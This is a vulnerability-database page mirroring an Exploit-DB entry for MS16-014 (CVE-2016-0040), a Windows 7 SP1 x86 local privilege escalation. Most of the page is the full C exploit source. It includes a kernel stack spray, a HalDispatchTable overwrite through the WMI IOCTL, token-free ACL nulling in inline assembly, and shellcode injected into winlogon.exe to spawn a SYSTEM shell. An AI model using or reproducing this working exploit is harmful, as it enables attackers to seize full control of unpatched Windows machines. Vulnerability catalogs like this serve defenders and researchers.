Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)

🗓️ 29 Jun 2016 00:00:00Reported by blomster81Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 289 Views

Microsoft Windows 7 SP1 (x86) local privilege escalation via MS16-01

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)
29 Jun 201600:00
zdt
0day.today		Windows WMI Recieve Notification Exploit
4 May 201800:00
zdt
GithubExploit		Exploit for CVE-2016-0040
3 Aug 201722:28
githubexploit
GithubExploit		Exploit for CVE-2016-0040
26 Feb 201618:00
githubexploit
ATTACKERKB		CVE-2016-0040
10 Feb 201600:00
attackerkb
Circl		CVE-2016-0040
4 May 201800:00
circl
CISA KEV Catalog		Microsoft Windows Kernel Privilege Escalation Vulnerability
28 Mar 202200:00
cisa_kev
CNVD		Microsoft Windows Elevation of Privilege Vulnerability (CNVD-2016-01082)
11 Feb 201600:00
cnvd
Check Point Advisories		Microsoft Windows Elevation of Privilege (MS16-014: CVE-2016-0040)
9 Feb 201600:00
checkpoint_advisories
CVE		CVE-2016-0040
10 Feb 201611:00
cve
Rows per page
/* 
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400

MS16-014 EoP PoC created from 
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights. 
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point

********* EDB Note *********

ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip

***************************

*/

#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>


typedef union {
	HANDLE Handle;
	ULONG64 Handle64;
	ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;

typedef struct {
	ULONG HandleCount;
	ULONG Action;
	HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
	HANDLE3264 UserModeProcess;
	HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;

#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring

typedef struct {
	IN VOID * ObjectAttributes;
	IN ACCESS_MASK DesiredAccess;

	OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;

typedef enum _KPROFILE_SOURCE {
	ProfileTime,
	ProfileAlignmentFixup,
	ProfileTotalIssues,
	ProfilePipelineDry,
	ProfileLoadInstructions,
	ProfilePipelineFrozen,
	ProfileBranchInstructions,
	ProfileTotalNonissues,
	ProfileDcacheMisses,
	ProfileIcacheMisses,
	ProfileCacheMisses,
	ProfileBranchMispredictions,
	ProfileStoreInstructions,
	ProfileFpInstructions,
	ProfileIntegerInstructions,
	Profile2Issue,
	Profile3Issue,
	Profile4Issue,
	ProfileSpecialInstructions,
	ProfileTotalCycles,
	ProfileIcacheIssues,
	ProfileDcacheAccesses,
	ProfileMemoryBarrierCycles,
	ProfileLoadLinkedIssues,
	ProfileMaximum

} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef struct _DESKTOPINFO
{
	/* 000 */ PVOID        pvDesktopBase;
	/* 008 */ PVOID        pvDesktopLimit;

} DESKTOPINFO, *PDESKTOPINFO;


typedef struct _CLIENTINFO
{
	/* 000 */ DWORD             CI_flags;
	/* 004 */ DWORD             cSpins;
	/* 008 */ DWORD             dwExpWinVer;
	/* 00c */ DWORD             dwCompatFlags;
	/* 010 */ DWORD             dwCompatFlags2;
	/* 014 */ DWORD             dwTIFlags;
	/* 018 */ DWORD				filler1;
	/* 01c */ DWORD				filler2;
	/* 020 */ PDESKTOPINFO      pDeskInfo;
	/* 028 */ ULONG_PTR         ulClientDelta;

} CLIENTINFO, *PCLIENTINFO;

typedef struct _HANDLEENTRY {
	PVOID  phead;
	ULONG_PTR  pOwner;
	BYTE  bType;
	BYTE  bFlags;
	WORD  wUniq;
}HANDLEENTRY, *PHANDLEENTRY;

typedef struct _SERVERINFO {
	DWORD dwSRVIFlags;
	DWORD64 cHandleEntries;
	WORD wSRVIFlags;
	WORD wRIPPID;
	WORD wRIPError;
}SERVERINFO, *PSERVERINFO;

typedef struct _SHAREDINFO {
	PSERVERINFO psi;
	PHANDLEENTRY aheList;
	ULONG HeEntrySize;
	ULONG_PTR pDispInfo;
	ULONG_PTR ulSharedDelta;
	ULONG_PTR awmControl;
	ULONG_PTR DefWindowMsgs;
	ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;

#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)

typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);

DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;

LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	return DefWindowProc(hwnd, uMsg, wParam, lParam);
}

DWORD getProcessId(wchar_t* str)
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;
	DWORD PID;

	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		return 0;
	}

	pe32.dwSize = sizeof(PROCESSENTRY32);
	if (!Process32First(hProcessSnap, &pe32))
	{
		CloseHandle(hProcessSnap);
		return 0;
	}

	do
	{
		if (!wcscmp(pe32.szExeFile, str))
		{
			wprintf(L"Process: %s found\n", pe32.szExeFile);
			PID = pe32.th32ProcessID;
			return PID;
		}
	} while (Process32Next(hProcessSnap, &pe32));
	return 0;
}

void Launch()
{
	void* pMem;
	char shellcode[] =
		"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
		"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
		"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
		"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
		"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
		"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
		"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
		"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
		"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
		"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
		"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
		"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
		"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
		"\x65\x78\x65\x00";

	wchar_t* str = L"winlogon.exe";
	DWORD PID = getProcessId(str);
	HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
	HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}

BOOL leakHal()
{
	_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
	PRTL_PROCESS_MODULES pModuleInfo;
	DWORD ntoskrnlBase;
	DWORD HalDTUser, HalDTOffset;
	HMODULE userKernel;

	pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (pModuleInfo == NULL)
	{
		printf("Could not allocate memory\n");
		return FALSE;
	}
	NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
	ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
	userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
	if (userKernel == NULL)
	{
		printf("Could not load ntoskrnl.exe\n");
		return FALSE;
	}

	HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
	HalDTOffset = HalDTUser - (DWORD)userKernel;
	g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
	return TRUE;
}

BOOL setup()
{
	LoadLibraryA("user32.dll");

	wc.cbSize = sizeof(WNDCLASSEX);
	wc.style = 0;
	wc.lpfnWndProc = WProc;
	wc.cbClsExtra = 0;
	wc.cbWndExtra = 0;
	wc.hInstance = NULL;
	wc.hCursor = NULL;
	wc.hIcon = NULL;
	wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
	wc.lpszMenuName = NULL;
	wc.lpszClassName = g_windowClassName;
	wc.hIconSm = NULL;

	if (!RegisterClassEx(&wc))
	{
		printf("Failed to register window: %d\n", GetLastError());
		return FALSE;
	}
	g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
	if (g_window == NULL)
	{
		printf("Failed to create window: %d\n", GetLastError());
		return FALSE;
	}

	g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
	g_UserHandleTable = g_pSharedInfo->aheList;
	g_pServerInfo = g_pSharedInfo->psi;

	return TRUE;
}

DWORD leakWndAddr(HWND hwnd)
{
	DWORD addr = 0;
	HWND kernelHandle = NULL;

	for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
	{
		kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
		if (kernelHandle == hwnd)
		{
			addr = (DWORD)g_UserHandleTable[i].phead;
			break;
		}
	}
	return addr;
}

VOID SprayKernelStack() {
	g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
	if (ZwMapUserPhysicalPages == NULL)
	{
		printf("Could not get ZwMapUserPhysicalPages\n");
		return;
	}
	BYTE buffer[4096];
	DWORD value = g_HalDispatchTable - 0x3C + 0x4;
	for (int i = 0; i < sizeof(buffer) / 4; i++)
	{
		memcpy(buffer + i * 4, &value, sizeof(DWORD));
	}
	printf("Where is at: 0x%x\n", buffer);
	ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}

__declspec(noinline) int Shellcode()
{
	__asm {
		mov eax, kHandle // WND - Which window? Check this
		mov eax, [eax + 8] // THREADINFO
		mov eax, [eax] // ETHREAD
		mov eax, [eax + 0x150] // KPROCESS
		mov eax, [eax + 0xb8] // flink
		procloop:
		lea edx, [eax - 0xb8] // KPROCESS
		mov eax, [eax]
		add edx, 0x16c // module name
		cmp dword ptr[edx], 0x6c6e6977 // �winl� for winlogon.exe
		jne procloop
		sub edx, 0x170
		mov dword ptr[edx], 0x0 // NULL ACL
		ret
	}
}

int main() {
	DWORD dwBytesReturned;
	HANDLE threadhandle;
	WMIRECEIVENOTIFICATION buffer;
	CHAR OutPut[1000];

	if (!setup())
	{
		printf("Could not setup window\n");
		return 0;
	}


	PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	kHandle = (void*)leakWndAddr(g_window);
	memset(userSC, 0x41, 0x1000);
	memcpy(userSC, Shellcode, 0x40);


	if (!leakHal())
	{
		printf("Could not leak Hal\n");
		return 0;
	}
	printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);

	DWORD value = (DWORD)userSC;
	PBYTE buff = (PBYTE)&buffer;
	for (int i = 0; i < sizeof(buffer) / 4; i++)
	{
		memcpy(buff + i * 4, &value, sizeof(DWORD));
	}
	printf("What is at: 0x%x\n", buff);

	buffer.HandleCount = 0;
	buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
	buffer.UserModeProcess.Handle = GetCurrentProcess();

	HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDriver != INVALID_HANDLE_VALUE) {
		SprayKernelStack();

		if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
			return 1;
		}

	}
	_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
	ULONG result;
	KPROFILE_SOURCE stProfile = ProfileTotalIssues;
	NtQueryIntervalProfile(stProfile, &result);
	printf("SYSTEM shell comming\n");
	Launch();
	printf("All done, exiting\n");

	return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jun 2016 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.2
CVSS 3.17.8
EPSS0.77331
SSVC
windows 7x86local privilege escalationms16-014elevation of privilege
289